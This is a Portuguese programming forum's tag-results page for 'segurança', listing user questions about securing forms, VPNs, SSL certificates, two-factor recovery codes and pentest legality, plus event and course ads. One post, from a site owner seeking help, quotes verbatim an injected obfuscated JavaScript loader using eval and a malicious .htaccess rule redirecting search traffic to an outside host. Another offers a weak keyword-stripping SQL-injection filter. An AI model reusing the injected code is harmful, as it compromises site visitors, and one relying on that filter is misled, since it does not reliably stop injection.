Jump to content

Search the Community

Showing results for tags 'segurança'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Comunidade
    • Sugestões, Críticas ou Dúvidas relativas ao P@P
    • Acerca do P@P
  • Comunidade a Trabalhar
    • Apresentação de Projectos de Programação
    • Downloads
    • Revista PROGRAMAR
  • Desenvolvimento Geral
    • C
    • C++
    • Java
    • Pascal
    • Python
    • Bases de Dados
    • Dispositivos Móveis
    • Outras Linguagens
  • Desenvolvimento Orientado para Web
    • PHP
    • HTML
    • CSS
    • Javascript
    • Outras Linguagens de WebDevelopment
    • Desenvolvimento Web
  • Desenvolvimento .NET
    • C#
    • Visual Basic .NET
    • ASP.NET
    • WPF & SilverLight
  • Software e Sistemas Operativos
    • Software de Produtividade
    • Sistemas Operativos
    • Apresentação de Software
  • Informática
    • Interfaces Visuais
    • Computação Gráfica
    • Algoritmia e Lógica
    • Segurança e Redes
    • Hardware
    • Electrónica e Automação Industrial
    • Matemática
    • Software de Contabilidade e Finanças
    • Dúvidas e Discussão de Programação
  • Outras Áreas
    • Notícias de Tecnologia
    • Dúvidas Gerais
    • Discussão Geral
    • Eventos
    • Anúncios de Emprego
    • Tutoriais
    • Snippets / Armazém de Código
  • Arquivo Morto
    • Projectos Descontinuados
    • System Empires

Blogs

  • Blog dos Moderadores
  • Eventos
  • Notícias de Tecnologia
  • Blog do Staff
  • Revista PROGRAMAR
  • Projectos
  • Wiki

Categories

  • Revista PROGRAMAR
  • Tutoriais
  • Textos Académicos
  • Exercícios Académicos
    • Exercícios c/ Solução
    • Exercícios s/ Solução
  • Bibliotecas e Aplicações
  • Outros

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website


GitHub


LinkedIn


Twitter


Facebook

  1. Bom dia a todos. Gostava que me pudessem ajudar pois quero zelar pela segurança de toda a informação que quero armazenar sobre clientes. Eu tenho um formulário com cerca de 20 campos que tenho que preencher com informação critica e queria ter a certeza de que a informação é enviada, armazenada e consultada com segurança, isto e, que ninguém consegue aceder a essa informação de forma ilicita. O formulário esta feito em html e é armazenada num servidor online agradecia que me dessem ideias e como fazer. Sinto-me um bocado desorientado e queria que me ajudassem explicando o que devo e como faze-lo. Já me falaram de usar json e que se instala-se um certificado ssh no servidor não me precisava de me preocupar com nada, mas antes de ter que aprender a usar json e instalar o certificado queria saber as vossas sugestões. Aguardo as vossas sugestões de forma a eu fazer algo em condições e ficar descansado no que diz respeito à segurança dos dados de outras pessoas com que vou ter de trabalhar. Cumprimentos a todos.
  2. Boa tarde, Alguém sabe se é possível no próprio código ou editor é possível substituir carateres por * . Eu tenho algumas passwords num ficheiro de configuração mas gostava de ao abrir o editor e vez da password fosse tipo asteriscos . Eu uso o Visual Studio Code Como está/Como queria <?php $pw = 'password1234'; ?> <?php $pw = '********'; ?>
  3. Um estudo um pouco assustador, mas não totalmente surpreendente, sobre a segurança da generalidade dos routers para o mercado doméstico. https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/HomeRouter/HomeRouterSecurity_2020_Bericht.pdf
  4. Boa tarde, Gostaria de saber se alguém já implementou um sistema de segurança (cópia, utilizadores ...) com as seguintes ideias em conta: -Tenho um aplicação de terceiros (que não possuo código fonte ou acesso ao mesmo) -Desenvolvi um sistema de validação (tipo webservice) em que vou validar um conjunto de ID's de hardware e outros itens. -Pretendia que a primeira aplicação só fosse possível de executar após validação com sucesso da segunda aplicação. Sei que existem soluções (tipo Sentinel, Hasp) que fazem envelopagem (um ficheiro dentro do outro) que permite fazer essa validação. Mas é uma solução proprietária e que não se adequa ao que pretendo. Alguma consideração em relação a isto ? Obrigado
  5. Boa tarde a todos Eu tenho um computador em casa que está sempre ligado, computador esse que tem varias câmeras de vigilância ligadas a ele. Eu através do ambiente trabalho remoto consigo aceder-lhe está ligado a minha rede de casa, mas quando estou fora e preciso de lhe aceder não consigo. Pelo que pesquisei uma VPN ia-me resolver o problema. Tenho internet da MEO e o meu roter é um Technicolor TG784n v3. Existe alguma maneira de ter uma VPN gratuita? Já vi um tutorial no PPLWARE (https://pplware.sapo.pt/informacao/tutorial-aceda-remotamente-sua-rede-meo-via-vpn/) já segui todos os passos mas depois não entendo como me ligar a VPN fora de casa.. Se alguém me pudesse ajudar agradecia. Desde já obrigado.
  6. Boas Preciso de instalar um certificado ssl no meu servidor iis alguem sabe como se faz este processo? Ouvi falar deste letsencrypt mas nao encontro o exe
  7. O DevFest Coimbra’16 é uma conferência tecnológica que se realiza no dia 3 de Dezembro, em Coimbra. Organizada pelo Google Developers Group (GDG) Coimbra, integra-se no ciclo de conferências GDG DevFest promovidas globalmente pela Google. Tem como objetivo, trazer o que melhor se faz de tecnologia ao centro de Portugal. Esta conferência é dedicada às áreas de mobile, web, design e segurança. Combina palestras, apresentadas por oradores de renome do sector tecnológico, com workshops tecnológicos, de forma a permitir o contacto direto dos participantes com a tecnologia mais recente e inovadora. O evento tem um custo associado de 5€, que revertem totalmente para a Liga Portuguesa Contra o Cancro e podem ser adquiridos: http://www2.last2ticket.com/pt/events/101/devfest-coimbra-2016. GDG Coimbra O GDG Coimbra é uma comunidade amadora de pessoas interessadas por tecnologia que se juntam para discutir ideias, desenvolver projetos, partilhar ideias (ou simplesmente beber uma cerveja, acompanhada por um nougat, o nosso “doce” atual de preferência). Entre os vários eventos organizados este ano pelo GDG Coimbra, constam: Study Jam (workshops), Developer Stories (palestras), I/O extended e Gather Hour. Redes Sociais #DevFestCbr #DevFest16 #GDGCoimbra Mais Info Site: http://devfest.gdgcoimbra.xyz Tickets: http://www2.last2ticket.com/pt/events/101/devfest-coimbra-2016 Facebook: fb.me/GDGCoimbra Google+: https://plus.google.com/+GDGCoimbra Twitter: @GDGCoimbra Email: gdgcoimbra@gmail.com
  8. Desde a minha primeira tentativa de usar um sistema de two-step verification (com o Google, há "muitos" anos atrás) não fiquei muito impressionado com o sistema. Por um lado por causa do impacto em termos de usabilidade, que me pareceu bastante negativo. Por outro, porque me pareceu que o sistema podia ser seguro de mais, e aumentava a probabilidade de perder o acesso à conta. Recentemente lembrei-me de estudar novamente o assunto, depois de receber mais um email de um serviço a recomendar a activação desta funcionalidade. E estes sistemas continuam a não me agradar muito... Temos serviços que obrigam à utilização da aplicação XPTO, e não me agrada ter que andar a instalar mais uma série de aplicações para os vários serviços. Por isso, quando possível, prefiro SMS. Contudo, com as funcionalidades de receber os SMS também nos PCs ligados ao smartphone, este método também fica com uma segurança mais limitada. Mas aquilo que mais me preocupa é mesmo o facto de habitualmente precisar de recovery codes para não correr o risco de perder o acesso às contas. Aqui a questão é como armazenar estes recovery codes? Guardá-los no PC não me parece totalmente seguro, mesmo que cifrados, visto que há sempre a possibilidade da segurança do PC ser comprometida. Imprimir este tipo de informação também não me parece lá muito boa política. A ideia que me dá é que este código vai acabar por funcionar como uma password, que se for comprometida também compromete a conta. É claro que terá a vantagem de não ser usado regularmente, o que ajuda a que o código não seja comprometido. Assim, gostava de saber quais as vossas opiniões, experiências e recomendações sobre este assunto.
  9. Entrevista Virtual a Edward Snowden pelo "The New Yorker Festival" (11-10-2014) Snowden está classifocado como um terrorista e é procurado pelas autoridades por ter divulgado informação confidencial. Atualmente vive na Rússia. A perspetiva do próprio é muito interessante sob várias perspetivas: Até que ponto vai a vigilância e monitorização sobre o que fazem os utilizadores na web e com os seus mobiles; Porque é que este não é um problema apenas dos USA Como podem os utilizadores contrariar "castigar" as empresas que o fazem; Como pode um leigo estar mais protegido; Porque é que o tão falado argumento "Eu não tenho nada a esconder. Podem ver os meus dados..." está errado... Aqui fica o link: https://www.youtube.com/embed/fidq3jow8bc?start=287&feature=oembed
  10. chbcl

    Problema segurança

    Boas, O meu problema é o seguinte, eu tenho um site que tem como root: D:/public_html/ e eu criei uma conta FTP que so dá acesso ao directorio: D:/public_html/user mas, com essa conta eu posso entrar em ftp e fazer UPLOAD de uma SHELL de deface, e aceder ao root ou seja ao disco D: e TODAS AS PASTAS , SUBPASTAS e ARQUIVOS! Como faço ou para tirar permissões de acesso para que nem a SHELL consiga ou melhor ainda BLOQUEAR as SHELL's que possam vir a ser upadas? Tou com urgencia nisso, agradecia que alguem me podesse orientar
  11. mais: https://www.openssl.org/news/secadv_20140605.txt
  12. O título do tópico diz tudo, estou à procura do melhor livro sobre segurança ao nível da administração de servidores em linux virados para o web hosting. Bem sei que "o melhor" é algo não consesual, pelo que aceito todas as recomendações de tudo o que seja acima de bom nesta área. 🙂
  13. Boas 🙂 Há alguns aspectos a ter em conta para criar de raíz um tema para o WP, simples, mesmo que não utilize todo o potencial da última versão da plataforma, mas feito de forma segura? Eu sei, a minha pergunta é retórica. Há! Tenho andado às voltas e gostaria de fazer um. O problema não é fazer o tema mas a preocupação em que seja segura, isto é, que não sirva de janela para ataques já que faz uso do PHP. - Para o que pretendo, estou à vontade com o PHP, CSS, HTML (e Javascript) - Não pretendo ter nenhum plug-in À parte da escrito do código poder ser comprarável a uma pintura de Picasso 🙂 a minha dúvida é mesmo esta. Com o tempo melhoro o código com base no meu conhecimento. Muitos dos ataques que vêm a público têm em muitos casos a ver com pass, facta de actualização do CMS e plug-in's. Thanks 🙂 Obs: quem diz WP pode também falar de Joomla! ou outro.
  14. Quando faço upload de imagens, poderá haver possibilidades de criar uma nova pasta automaticamente, e como tal, como pretendo maior segurança, gostaria que fosse possível criar um ficheiro "index.php" (em vazio) ou então copia-lo de outra pasta, para assim, obter uma maior segurança entre todos as pastas. Alguém sabe um método para esta questão?
  15. Bom dia, queria se fosse possível que me respondessem a uma pergunta Eu estou a pensar em começar a construir uns websites para algumas empresas, tenho portfolio..., o meu problema e a maneira como estou a pensar em fazer, para angariar clientes pensei em oferecer pentests, claro que se estes testes fossem feitos e apresentassem vulnerabilidades nas plataformas das empresas as quais o teste era oferecido, obrigatoriamente elas teriam que me comprar a plataforma Eu sei que por lei eu posso efectuar testes e invadir plataformas dez que seja autorizado pelo proprietário a minha duvida é se posso invadir plataformas autorizadas pelo proprietário se elas tiverem alojadas nos servidores da empresa que criou as criou ex a abc desenvolveu uma plataforma para a empresa xpto e o website encontra-se nos servidores da abc Depois encontro-me com a xpto e ofereço o teste de invasão, será que o posso mesmo fazer legalmente?
  16. Tenho um sistema que utiliza base de dados access. Nela tenho uma tabela Tbl_Usuarios com os campos: ID, USER, PASS No sistema existe a possibilidade de trocar de senha, mas ainda não sei como implantar a parte de perda da senha. Se o usuário perder, ou esquecer a senha, tenho adotado a prática do administrador do sistema ir no cadastro de usuários e trocar a senha manualmente, com os asteriscos é claro. E passar via email a nova senha para o usuário. Alguém poderia me dar uma sugestão de uma melhor maneira do usuário poder trocar a senha sem ter que informar a nova senha ?
  17. Como o título do tópico diz gostaria de saber quais são as formas de tornar a nossa ligação à internet mais segura? Para além da utilização de um antivírus e de uma Firewall (como deve ser configurada) existem outro métodos para aumentar a segurança da nossa ligação por exemplo encriptação ou ligações a VPN? Se sim como se faz agradecia um tuturial se pudesse.
  18. Boa noite pessoal, Estou com um problema, alguns dos meus sites estão a ser atacados. O ataque acontece sobre os ficheiros .htacess, js e alguns php. O que acontece é que é escrito nos ficheiros o seguinte: .ficheiros javascript e php: #336988# <script type=\"text/javascript\" language=\"javascript\">try{window.document.body++}catch(gdsgsdg){dbshre=9;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,110,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,110,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,93,108,105,40,45,97,38,97,105,104,92,38,105,102,42,90,107,108,41,96,106,92,39,106,99,103,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,107,104,102,112,107,93,32,53,8,1,24,25,26,27,106,38,108,110,116,99,93,39,92,106,105,92,94,108,27,52,24,32,42,34,50,5,3,26,27,23,24,108,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,101,95,97,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,111,102,104,25,55,27,30,41,105,114,34,50,5,3,7,5,23,24,25,26,100,93,24,33,27,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,34,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,107,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,106,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s=\"\";for(i=0;i-447!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>"; #/336988# ficheiros .htacess: #336988# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar| allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport| arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw| brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz| clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb| euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow| finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet| friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google| goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland- information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb| kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin| live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek| msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange| passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium| searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina| startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico| telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online| topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web| webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch| wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://aceoot.org/esd.php [R=301,L] </IfModule> #/336988# Alguém me pode ajudar com isto? como posso impedir que estes ficheiros sejam afectados e escritos?
  19. Pois bem tava aqui eu a trabalhar e tal, e surgiu uma duvida a nivel de segurança... para os outros campos, get's, post's e associados estou a usar esta função: function anti_injection($sql, $formUse = true) { // remove palavras que contenham sintaxe sql $sql = preg_replace("/(from|select|insert|delete|where|drop table|show tables|like|grant|revoke|#|\*|--|\\\\)/i","",$sql); $sql = trim($sql);//limpa espaços vazio $sql = strip_tags($sql);//tira tags html e php if(!$formUse || !get_magic_quotes_gpc()) $sql = addslashes($sql);//Adiciona barras invertidas a uma string return $sql; } mas o problema é que eu estou a usar um editor visual de html (o tinymce mais precisamente), sendo assim, vai ter de passar dados html, e nao sei como fazer para tornar essa transmissao de dados segura... ja agora esse campo que recebe os dados html, está no tipo memo, talves se usar o tipo blob seja melhor? Aguardo opiniões
  20. Ando a pesquisar um pouco sobre PHP e MySql e a conecxão que utilizo é a seguinte: <?php $con = mysql_connect('localhost','root','password') or die(mysql_error()); if($con){ $database = mysql_select_db('pessoas') or die(mysql_error()); } ?> Bem é verdade que funciona bastante bem mas creio que não é uma forma segura pois basta abrir este ficheiro e ficamos a saber a palavra-passe da base de dados. A minha pergunta é a seguinte: existe alguma forma de fazer esta conexão (PHP ao MySql) de forma segura?
  21. O melhor guia para testes de intrusão... Guia para download http://www.isecom.org/osstmm/ teckV
  22. ATENÇÃO Criminals kick off Japanese disaster scams at record speed http://www.computerworld.com/s/article/9214518/Criminals_kick_off_Japanese_disaster_scams_at_record_speed teckV
  23. Quem quiser um bom RoadMap do que aprender para ser um PenTester, veja este PDF sobre o curso. Para saberem os conhecimentos e ferramentas necessárias. http://www.elearnsecurity.com/course/penetration_testing/syllabus.pdf If you're serious about advancing your career in IT security, then you owe it to yourself to spend 1 minute checking out our course. It will be well worth your effort! eLearnSecurity is the only course to: * Have three authors, each leading respective field of competence. * Couple great theoretical explanation with lots of watch and do videos and exercises * Bring the student from the basics to the most advanced aspects of every technique without leaving anyone behind * Provide the student with strong project management methodology tools to use during real pentests * Teach how to build a penetration testing report that talks to executives and developers with their own language * Certify that the student is capable of pentesting a real target and producing a comprehensive and risk based report * Have an engaging and interactive e-learning environment that truly set itself apart from other distance learning courses At the end of our course you will master: * Modern Information gathering techniques * Vulnerability assessments with Nessus * Exploitation with Backtrak 4 and Metasploit * Buffer overflows in depth * Writing your own Remote execution code * Writing your own Shellcode * Writing your own Rootkit * Studying and attacking complex Web Applications * Going from XSS to Root * Going from SQLi to Root * Exploiting Web 2.0 vulnerabilities Our course qualifies you for 40 CPE, upon eCPPT exam completion. Becoming an eLearnSecurity Certified Professional Penetration Tester (eCPPT) will prove your skills both at hacking and providing the right business-aware solutions as a professional penetration tester. This makes the difference. Módulo SQL Injection oferta DEMO http://www.elearnsecurity.com/course/penetration_testing/lp/hakin9.php Mais sobre a Certificação http://www.elearnsecurity.com/course/penetration_testing/eCPPT.pdf Mais informação em: http://www.elearnsecurity.com/course/penetration_testing/lp/hakin9.php teckV
×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.